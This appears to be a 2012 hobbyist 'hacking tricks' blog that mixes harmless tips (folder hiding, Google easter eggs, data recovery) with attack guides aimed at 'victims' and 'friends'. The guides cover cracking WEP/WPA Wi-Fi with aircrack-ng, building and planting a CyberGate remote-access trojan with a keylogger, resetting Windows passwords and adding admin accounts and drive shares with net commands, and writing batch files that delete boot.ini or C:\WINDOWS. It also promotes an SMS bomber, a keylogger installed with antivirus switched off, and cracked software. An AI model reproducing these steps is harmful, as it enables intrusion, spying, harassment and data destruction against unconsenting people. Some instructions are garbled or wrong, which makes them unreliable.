Join us on Facebook

Thursday 20 December 2012

HOw to Hide a Folder

Awesome Folder Hiding Trick
For Windows
Now I will teach U a best and
the most premium way to
hide your personal stuff from
the unknown or strangers eyes.
The one simplest way
everybody uses is just going to
tools>folder
options>view>then selecting
hide folder and that’s it
but I
will tell you the best way in
which if a unknown person
selects view hidden files than
also it will be not visible to
anyone.



This trick is very cool and most
of the people don't know this
trick. So it will be always better
to use this trick to hide your
folders instead of using the
windows default folder options
trick.

How to Hide Folder :
1. First create the folder in the
drive you want to hide.

example : Creating ABC folder in
D: drive

2. Now you have all the stuff
which U want to hide from the
people in ABC folder which is in
D: drive

3. Now go to RUN by hitting
Windows key + R

4. Type attrib +s +h D:/ABC

5. The above one is the
command for hiding the folder,
in above command D is the
drive name and ABC is the folder
name as I mentioned above.

6. Now simply hit Enter to Hide
and vanish away ABC folder and
become safe from the
unattended stranger.
How to Unhide Folder :
1. Now you had learned to hide
your folder in a premium way
well ya you can test it by going
to tools/folder option/show
hidden files, it will still not show
and its totally hidden.

2. Now to unhide it what you
need to do is too simply reverse
the RUN Command which you
previously gave to hide your
folder.

3. Now again open RUN and
reverse the command attrib –s –
h D:/ABC

4. That’s it now you had reveled
your personal files so hide them
again or I will see them :)

Wednesday 19 December 2012

Games

<embed width="640" height="480" base="http://external.kongregate-games.com/gamez/0015/8640/live/" src="http://external.kongregate-games.com/gamez/0015/8640/live/embeddable_158640.swf" type="application/x-shockwave-flash"></embed><br/>Play free games at <a href="http://www.kongregate.com/">Kongregate</a>

Sunday 16 December 2012

Google Tricks

Today's Fun
"Google- I'm Felling Lucky"

1. Type “let it snow” and click on I’m Feeling Lucky. (awesome snow effect)

2. Type “google gravity” and click on I’m Feeling Lucky. (things start falling down)

3. Type “elggog” and click on I’m Feeling Lucky. (amazing mirror effect)

4. Type “do a barrel roll” and click on I’m Feeling Lucky. (a nice barrel roll attempted)

5. Type “who’s awesome” and click on I’m Feeling Lucky.



6. Type “tilt” and click on I’m Feeling Lucky. (webpage in 3D)

7. Type “who is the cutest” and click on I’m Feeling Lucky. (cute reviewed)

8. Type “google loco” and click on I’m Feeling Lucky. (someone starts moving)

9. Type “lol limewire” and click on I’m Feeling Lucky. (awesome picture)

10. Type “epic google” and click on I’m Feeling Lucky.

11. Type “rainbow google” and click on I’m Feeling Lucky.

12. Type “annoying google” and click on I’m Feeling Lucky.

13. Type “google pacman” and click on I’m Feeling Lucky.

14. Type “google heart page” and click on I’m Feeling Lucky.

15. Type “google magic” and click on I’m Feeling Lucky.

16. Type “google (color name)” and click on I’m Feeling Lucky.

17. Type “epic box” and click on I’m Feeling Lucky.

18. Type “sexy snape” and click on I’m Feeling Lucky.

19. Type “google sphere” and click on I’m Feeling Lucky.

20. Type “weenie google” and click on I’m Feeling Lucky.

Saturday 15 December 2012

Cracking WEP,WPA,WPA1 Wifi Networks By using aircracks png

Cracking WEP, WPA and WPA2 Encrypted Wifi Networks using Aircrack-ng.
In this tutorial I will demonstrate you how to crack almost any Encrypted Network that uses WEP, WPA and WPA2.

1. Before we start. 
What we need:
Linux:
sudo apt-get install aircrack-ng airmon-ng airodump-ng aireplay-ng kismet
(Recommended Download for Linux Users – It auto configures the tools needed)
Backtrack:
NOTHING! Every is included by default in backtrack….


2. WEP Cracking.
WEP is very easy and fast to crack. Here are the steps:
1. Put your Wireless Interface into Monitor Mode:
airmon-ng start wlan0
(In this example our interface is ‘wlan0′ – To find out your wireless interface type: iwconfig scan or airmon-ng )

2. Get Info from the Available Networks:
airodump-ng mon0
(mon0 is the monitored wlan0 interface)

3. Select one network that uses WEP encryption. In our Example the network is named SKIDHACKER. Now, get more info on the specific Network:
airodump-ng -c channel -w filetosave –bssid macaddrs mon0
(‘channel’ is the Channel Number) (‘filetosave’ is the file that airodump-ng will save its data) (‘macaddrs’ is the MAC Address of the Network) —> All this info is provided by the command used in Step 2.

4. To boost the proccedure type on a new terminal:
aireplay-ng -1 0 -a bssid mon0
(‘bssid’ is the MAC Address of the Network)

5. When this command is done, capture packets by typing:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0
(‘bssid’ is the Networks MAC Address)

6. When the above command gets about 20.000 – 30.000 packets you are now able to crack the network by typing:
aircrack-ng filename.cap
(where instead of ‘filename’.cap you enter the file that aireplay-ng saved at your current directory – This file is named wep-x.cap –x is a number, starting from ’01′, then ’02′ etc….–) (Instead of the ‘wep-01.cap’ you can use the ‘wep*.cap’ as in the example to ‘Auto-Select’ the file)

7. When aircrack-ng finds the key it will display something like:
KEY FOUND! [ 12:34:56:78:90 ]
(In this example our key is ’1234567890′)
8. When Finished, make sure you put your wireless interface back to original Mode by typing:
airmon-ng stop wlan0
_____________________________________________________

3. WPA – WPA2 Cracking

How it is Cracked:
WPA-WPA2 are a special case when it comes to Wireless Network Cracking. The method used to crack them is named ‘Handshake’. What should we do to get the Handshake is fooling a Computer connected to the network we will crack. Then we will use a dictionary to crack the Handshake and get the Key. So, this means that to crack these networks we need:
A huge dictionary / wordlist – The bigger, the Better. (You can find searching the web using terms like: ‘Large WPA-WPA2 Cracking Wordlist’)
A PC already connected to that network.
So, let’s go and crack that network:
1. Enter your wireless interface into monitor mode:
airmon-ng start wlan0
(List your interfaces by typing airmon-ng or iwlist scan)

2. Get the list of the networks available:
airodump-ng mon0
(‘mon0′ is the monitored interface)

3. Get info on a specific Network:
airodump-ng -c channel -w filename –bssid macaddrs mon0
(‘channel’ is the Network’s channel number) (‘filename’ is the name of the file that airodump-ng will save its data) (‘macaddrs’ is the Network’s MAC Address)

4. Note that under the STATION Tab there is a MAC address. This means that there is someone connected to that network and this is his PC’s MAC address. To get the handshake we will kick him off and he will automatically reconnect to the network.
So, to kick him of and get the handshake, type at a new terminal:
aireplay-ng -1 0 -a bssid mon0
(where ‘bssid’ you must type the Network‘s MAC Address)

5. When we successfully get the handshake, stop the proccess by hitting CTRL+C at the terminal that Airodump-ng is running. The handshake should be placed at your Home Folder.

To crack it type:
aircrack-ng -w dictionary /username/filename
(‘dictionary’ is the name/path of your dictionary) (‘username’ is your username – on Backtrack is ‘root’ by default) (‘filename’ is the captured WPA/WPA2 Handshake)

Saturday 8 December 2012

Hack XP

How to hack pasword for win xp through 'CMD' >>

1. Go to 'run' and type 'cmd'
2. enter d program
3. a screen vl appear, 
4. then type exactly lyk ds 'net user'
5. then d pc user domain name vl appear, . remember d user name of d pc
6.  then  exactly type lyk ds 'net user <user name of d pc> *'
7. pasword hacked
8. then  go to control panel nd type ur own pasword 9. dis trik is effectv, it doesnt fail,

Wednesday 28 November 2012

How to call from skype to mobile for free

skype se mobile per free call karoo unlimited
aur ek tym mien 6 friend se video chat karoo
ye kesey kerna hai bs 1 mint mein

download here link
http://urpcsoft..tumblr..com/Special/Offer

link ko copy jo extra dot(..com) hai os ko hatam karoo aur url mein post karoo

just remove extra dot(..com) and past url

HOw to Remove Newfolder.exe Virus from your pc

How to Remove Newfolder.exe Virus easily

1. Find out all the locations of the “newfolder.exe” virus.
2. Open the task manager and end the newfolder.exe process running in background.3. Open cmd and then type “dir /a XXX” where XXX is the name of the folder where the virus is.
4. Then type “cd XXX”.
5. Delete the file by typing “del name_of_file”.
6. Then remove the whole folder by typing “rmdir /s XXX”.
7. The virus has been removed just see the task manager once again and end the newfolder.exe process running in the background (if any).
8. Restart the system nddddddddd Enjoyyyyyyyy!!!

Youtube tricks

VIDEO NOT AVAILABLE IN UR LOCATION! [HOW TO OVERCOME THIS]
guys, ok smtyms when using youtube.com u may get tht msg. recently i wanted to get the video of PSY's hot new song - gangnam style and i got tht error. here is a quick solution to tht 

SOLUTION
when u get tht error msg] just go to ur browser's URL bar.

#1)copy tht whole youtube URL

#2)paste it in keepvid [dot] com (replace the word dot with (.) facebook
regulations prevent me from writing it the normal way

#3)from there u can choose to play it or download it


remember to share this solution to any one in the same
predicament!

Softwares

 A net filter software to protect children from inappropriate web content.Control and block certain content from the Internet.Seen the numbers of porn sites on the Internet, parents are sometimes not aware of what their children are on. With Anti-Porn you will have the possibility to control what sites your children are on and at the same time limiting their connection time. 

DOWNLOAD FROM THIS LINK:http://en.kioskea.net/download/download-835-anti-porn


System requirements

  • Operating Systems: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8 (32/64 bit)
  • RAM: 250 MB.
  • Processor: Pentium 100 MHz.
  • Hard disk: 3.27Mo free space.


Memory Card Hacking

Memory card Password Hack

Follow These Steps: Step1: Install X-Plore in your mobile. 
Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"
Step3: Once you done that now go to the following path C:/Sys/Data/ Mmcstore 
Step4: Once you reached there you need to press "3" under option to set it in the Hex-viewer
Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6).
Just check the character between the "?" it is your password ie: 62626 Note: If you have not set the password, then you will not able to gain access to C:/ Sys/Data
Supported devices for X-plore:

Symbian S60 3rd/5th editionNokia: E50, E51, E52, E55, E60, E61, E62, E63, E65, E66, E70, E71, E72, E75, E90, N71, N72, N73, N75, N76, N77, N78, N79, N80, N81, N82, N85, N86, N91, N92, N93, N95, N96, N97, 3250, 5230, 5235, 5320, 5500, 5530, 5630, 5700, 5730, 5800, 6110, 6120, 6124, 6210, 6220, 6290, 6650, 6710, 6720, 6730, 6760, 6788, 6790, X6, C5-00, C6-00Samsung: SGH i400, i450, i520, i550, i560, G810, L870, I7110, i8510, i8910Son Ericsson: SatioLG: JoY, KT610, KT770 Symbian S60Nokia: 3230, 6260, 6290, 6600, 6620, 6630, 6670, 6680, 6681, 6682, 7610, N70, N90, Panasonic: X700, X800

download here: http://wfs02.wapka.mobi/download/e/2/8/144972_e2867df8a628f122b0b869dc9815.zip/28e131265d6ea8fc3ffc/xplore_symbian_lcg_1_51.zip

Tuesday 27 November 2012

How to Hack your friends computer using Cybergate !!!

How to Hack your friends computer using Cybergate !!! 
1) Download the Software  from this Link; http://www.4shared.com/file/N2GgFZCQ/CyberGate_v1180.html
2)Install Cybergate. 
3)After Installation it will ask you for the Password. 
Default Password: cybergate 
4)Once you have put the password, Click on Login. 
You will get the message 
CyberGate Station is now unlocked and fully functional. 
5)After that Click on control Center ==>Start 
It will Ask you for the Port Number. You can assign any Port number from 0 to 65535.But remember don't assign well known Ports like 80,21 etc.. 
6) Once You have Assign the Port Number ,Go to Control Center ==>Builder==>Create Server 
http://1.bp.blogspot.com/-YNKUBF....PG 
After that Add the New User==>>Ok==>>Then Double Click on the User you have Add 
http://4.bp.blogspot.com/-gibw5b....PG 
7)Now Click on Add. 

After that you will need to add your IP Addresswith the Port number you have add before. 
Eg: 192.168.1.1:999 
To get You IP address go to Run==>cmd==>>ipconfig 
8)Once you have Added the IP address and Port number go to Installation Tab . 


Here you will get Different Option. 
=>Installation Directory : 
Now Select any one option. where you want to infect your trojan in your Friends computer . 
=>Boot: 
Select Registry option also . 
Always Select the Random keys for Active Setup and Mutex. 
=> Inject Into: 
Mostly Select the Default Browser. 
9)Now go to Message Tab: 


You can display any message on your Friends computer , when he opens your File.. 
10)Now go to Keylogger Tab: 


It will give you all the Keystrokes of your Friends computer. 
11)Now Directly Create Server: 
Click on Create Server and Save you File .. 
After that just give this file to your Friend and when he click on that File you will get the access of his system. 
You can download his files at your End.If the Person is having the Webcam you can access it..That's you are Having the Total Control of his System.. 
Note: You will maintain the Access till you have the same IP assign to your Computer..



Monday 26 November 2012

Scary Virus

                                             Make frnds scare for VIRUS



Open notepad and type this:

lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")

Then save it as Virus.VBS

and go to the folder that contains it and open it if a window pops out saying a virus has been detected it's working. Press yes or no to close the window and put it in the startup folder of the victim's account.
On startup the window should appear.
Note: This does not harm your computer as it does not contain virus.

The Yes and no button does not do anything except closing the window. And you can edit the virus in the sentence: Warning a virus has detected on your PC to any kind of virus eg.Trojan Horse like this lol=msgbox ("Warning a Trojan horse has been detected on your PC. Press YES to format your hard disk now or press NO to format format your hard disk after system reboot",20,"Warning")

Oh in between make sure your victim does not panic and really reformat his harddisk. hahaha :)

Hacking via dos




                                                             Hacking via dos

try these following dos commands and use them for hacking

1) ping command
a cool way to say hello to victim
try
ping [victims ip goes here]
if the result is request timed out then the user is ofline
if the result is reply from [ip] bytes=32 time<1ms TTL 64 the victim is online.

2)net user [anyname] /add
it adds a new net user put any name inplace of [anyname]

3)net localgroup administrators [anyname] /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.

4)net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
you can use any root dir. instead

5)net use \\victimip [nameofnetaccount]
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
where nameofnetuser is the name via which victim logs on

6)explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!

Another Easy way to Create a virus in Computer

Write VIRUS to computer in 2 minutes

1) Creating virus trick
open ur notepad n type the following.........
type del c:\boot.ini c:\del autoexec.batsave as .exe[save it as .exe file....n u can save it by ne name]
create the notepad in c: drive...

2)
Note: but with in seconds harddisk get damaged

create Virus in 5 minutes.......
Very easy but dangerous VirusOk, now, the trick:
The only thing you need is Notepad.
Now, to test it, create a textfile called TEST.txt(empty)
in C:\Now in your notepad type "erase C:\TEST.txt" (without the quotes).
Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone.
Now, the real work begins:Go to Notpad and
type erase C:\WINDOWS (or C:\LINUX if you have linux) and
save it again as findoutaname.cmd.
Now DON'T run the file or you'll lose your WINDOWS map.
So, that's the virus. Now to take revenge.
Send you file to your victim.
Once she/he opens it. Her/his WINDOWS/LINUX map is gone.
And have to install LINUX/WINDOWS again.
Simple explanation:Go to notepad, type erase C:\WINDOWS, save,
send to victim, once the victim opens it,
the map WINDOWS will be gone and have to install WINDOWS again...
HEY I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!AGAIN :I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

be aware of this..its a simple but a strong virus that can delete anyones window os through email ..ok
i am not at all responsible for any of the further cause

Data Recovery

WHY U SHUD NOT BE CHEATED OVER DATA RECOVERY
these r the reasons why u should not hv to pay money for data recovery coz some of these things u can do urself. here are few pointers. and a downlod links 2 good recovery softwares

5 SIMPLE THINGS U SHUD KNW 1ST.
FACT 1
if eva u accidentally delete a file or lose a file on ur
comp d 1st thing do is STOP using the machine till u can 
run a recovery program

REASON WHY
deleting a file does nt remove the file from a comp its alway
s there only the pointer 2 tht file is removed HOWEVA if u 
continue using d machine, the space occupied by the file
is re-written making it IMPOSSIBLE 2 recover

FACT 2
if u used a deleting software or file shredder 2 delete the 
file its IMPOSSIBLE 2 recover d file no matter wat software u use

REASON WHY
lyk i said files r never deletd only pointers 2 them r so wen u 
delete using software a.k.a secure delete n this is wat happens. 
the space occupied by tht software is re-rwitten with random 1s and 0s.

FACT 3
physical damage 2 hard disk is possible bt EXTREMELY hard 2 repair n 
it needs are pro u will charge u no less thn 4 000 000(YES 4ma).in 
uganda here i dnt knw of anybody hu can. if sm1 ask u less he's 
jst toying wth ur hard disk

REASON WHY
opening hard disks requires high tech specialised dusty free rooms
(lyk uv seen in moviz) coz once open even 1 speck of dust fries the 
disk 4EVA. also no single hard disk is made with standardized parts even 
4 the same models.

FACT 4
even when d comp tells u ur file(ms word, doc, photo ziki) is corrupted,
tht does not mean the file is gone so dnt delete it

REASON WHY
most corrupted files are usually intact only tht there parts of d file nt 
visible to us called headers which get corrupted so it a comp cnt read the
header it will say FILE CORRUPTED. jst google peograms tht can repair the 
file and ur fine

FACT 5
when using password recovery software ALWYZ try 2 avoid using the RESET PASSWORD
option. this ie usually the easiest way to gain back access into the 
machine(windows n linux) esp if the hard disk is encrypted

REASON WHY
windows uses the password as a key 2 decrypt data on the hard disky do reseting 
the password cud give u access bt ul NEVER read ur old stuff

FILE RECOVERY SOFTWARES
lyk i said there are many of these tools available over the internet
u can tryout these:
http://download.getdata.com/RecoverMyFiles-Setup.exe
http://www.softwaregeek.com/mirror.php?sid=53303&index=1
http://www.softwaregeek.com/mirror.php?sid=65999&index=1

FOR FULL VERSION SOFTWARES
torrents are the best foe geting such programs so if i have utorrent installed
u can get these programs. they are the best recovery tools i know.
http://thepiratebay.se/torrent/7466257/Stellar_Phoenix_Windows_Data_Recovery_4.1.0.1
http://thepiratebay.se/torrent/7290657/Auslogics_File_Recovery_3.3.0.0_with_crack
http://thepiratebay.se/torrent/7372319/Power_Data_Recovery_Cracked_By_Dr.IfOff

THTS IT.
remember to share this. Knowlege is a gift and it shud be treated as such!
ope this is helpful.have fun

''MORE HACKING'' Introducing to you beaver sms bomber pro

             ''MORE HACKING'' Introducing to you beaver sms bomber pro

this program will bomb the victim's mobile phone with tons of sms. it supports all major networks and dont worry if your network is not listed you can add it there under custom options. you can also add list of multiple victims and bomb them simultaneously.

download from here
Click Here

Sunday 25 November 2012

What is spotflux?




What is spotflux? 

Spot Flux is devoted to protecting your digital privacy and security anywhere and on any device. Our tiny, but powerful application not only encrypts your internet traffic, it also performs millions of cloud-based, real-time calculations to remove tracking cookies and viruses without slowing your device.

Keylogger






Ardamax Keylogger


Download :  Ardamax Keylogger  


In the taskbar right click on the keylogger and click enter registration key and fill the details below. 



Note:- 
If you want to uninstall this keylogger via Control panel it uninstalls but it is a Trojan Keylogger so it cant be removed totally from your computer so we provided the removal tool of this tool,by this it can be removed totally from your PC.


 Download Ardamax remover
                                        


Antivirus Detects it so Before Downloading it change  your Antivirus settings to that allows this.

© 2013 Noobs-Acadmy. All rights resevered. Designed by Templateism